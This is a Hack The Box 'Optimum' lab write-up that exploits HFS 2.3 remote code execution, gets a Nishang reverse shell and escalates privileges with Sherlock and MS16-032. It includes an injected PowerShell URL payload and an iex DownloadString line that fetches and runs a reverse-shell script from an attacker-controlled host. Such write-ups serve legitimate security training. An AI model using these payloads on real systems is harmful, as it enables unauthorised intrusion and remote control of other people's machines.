HTB Optimum Write-up (Windows) - Powershell Download String, HFS File Server 2.3 Vuln, Sherlock
What I learned:
1 liner
HTTP Enum:
HttpFileServer 2.3
Searchsploit result:
https://www.exploit-db.com/exploits/49584
This exploit worked but IPPSec's walkthrough video does it in better way.
The HFS file server uses rejetto language
The 2.3 version is vulnerable for remote code execution.
We can execute command with following syntax accoding to the wiki page:
We can confirm this by typing:
and set up the tcpdump to listen for any command execution: (NEW)
This shows that it's exploitable.
Windows have 32bit and 64 bit versions. For file systems:
C:\windows\System32
c:\Windows\SysWow64 -> this is still 32bit
C:\Windows\SysNative -> this is 64 bit
So we will try the 64 bit.
http://10.129.1.127/?search=%00{.exec|c:Windows\SysNative\WindowsPowershell\v1.0\powershell.exe ping IP.}to test if the ping works with the powershell method.
Once confirmed, we can use a toolset called "Nishang" > shells > PoweShellTcp.ps1 and copy it to somewhere else as we need to modify it a bit.
At the end of the script, we need to add one sentence:
And run nc for that port specified.
Finally, we can download the file on the File Server by typing:
And now we get the usershell!
With this method, we can download a priv esc scripts?
---
Prev Esc
Since we are already running powershell on the server, let's use a native tool called sherlock.
Edit the Sherlock script, and add a method we want to use at the end of the script:
In this case, Find-AllVulns
We see it's vulnerable to 3 exploits!
MS16-032, MS16-034, MS16-135
Try MS16-032
At the end of the script, edit
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.119.188:80/shell.ps1')"
transfer over the TCP reverse shell Ps1 script (nishang) to the same directory and edit the port to something other the last one and start the python http server to host them
Run the nc on the port before running it.
It worked!
Last updated